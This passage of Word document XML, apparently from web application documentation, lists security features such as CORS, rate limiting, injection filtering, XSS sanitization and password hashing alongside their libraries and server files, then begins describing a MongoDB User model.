                <w:rFonts w:ascii="Cambria" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/server/server.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A651C" w:rsidRPr="00F13D01" w14:paraId="6E6A67FC" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2856" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="470E5099" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>CORS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3088" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B36E01E" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>cors</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2111" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53408CE7" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Cambria" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/server/server.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A651C" w:rsidRPr="00F13D01" w14:paraId="13B8FAB7" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2856" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0324283C" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Rate Limiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3088" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D2838AD" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>express-rate-limit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2111" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B130524" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Cambria" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/server/server.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A651C" w:rsidRPr="00F13D01" w14:paraId="56E3C521" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2856" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A7700A5" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>NoSQL Injection Filter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3088" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02607C55" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>custom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2111" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A8E79CF" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Cambria" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/server/server.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A651C" w:rsidRPr="00F13D01" w14:paraId="7E6414A0" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2856" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B0E660A" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Input Validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3088" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="726D92C7" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>express-validator</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2111" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70A4D3F3" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Cambria" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/server/routes/auth.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A651C" w:rsidRPr="00F13D01" w14:paraId="0FE520B6" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2856" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="607827FF" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>XSS Sanitization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3088" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CA354CC" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>sanitize-html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2111" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20F91D48" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Cambria" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/server/routes/tickets.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A651C" w:rsidRPr="00F13D01" w14:paraId="17DEAB5E" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2856" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64249984" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Data Validation Schema</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3088" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B224E05" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Joi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2111" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E17F354" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Cambria" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/server/routes/tickets.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A651C" w:rsidRPr="00F13D01" w14:paraId="354701F4" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2856" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5461046C" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3088" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28F383D2" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>jsonwebtoken</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2111" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2114C7F0" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Cambria" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/server/routes/auth.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A651C" w:rsidRPr="00F13D01" w14:paraId="65644B63" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2856" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0022B739" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Password Hashing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3088" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EDBC76B" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>bcryptjs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2111" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="607E392D" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Cambria" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/server/models/User.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A651C" w:rsidRPr="00F13D01" w14:paraId="61317207" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2856" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53ACFF36" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Google OAuth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3088" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EC7AA30" w14:textId="0E9C7BF5" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>passport-google</w:t>
            </w:r>
            <w:r w:rsidR="001A651C">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>oauth20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2111" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CD8B8AC" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Cambria" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/server/server.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="194C9C1C" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B87D866" w14:textId="4A8ABD7D" w:rsidR="00FC5B42" w:rsidRPr="004E318F" w:rsidRDefault="00FC5B42" w:rsidP="00EE11A0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc214584800"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Database (MongoDB + Mongoose)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="08D8AB66" w14:textId="1D533E90" w:rsidR="00FC5B42" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>User Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C771776" w14:textId="61BD9BAC" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ile: /server/models/User.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCBBB05" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Fields:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D28EA6" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
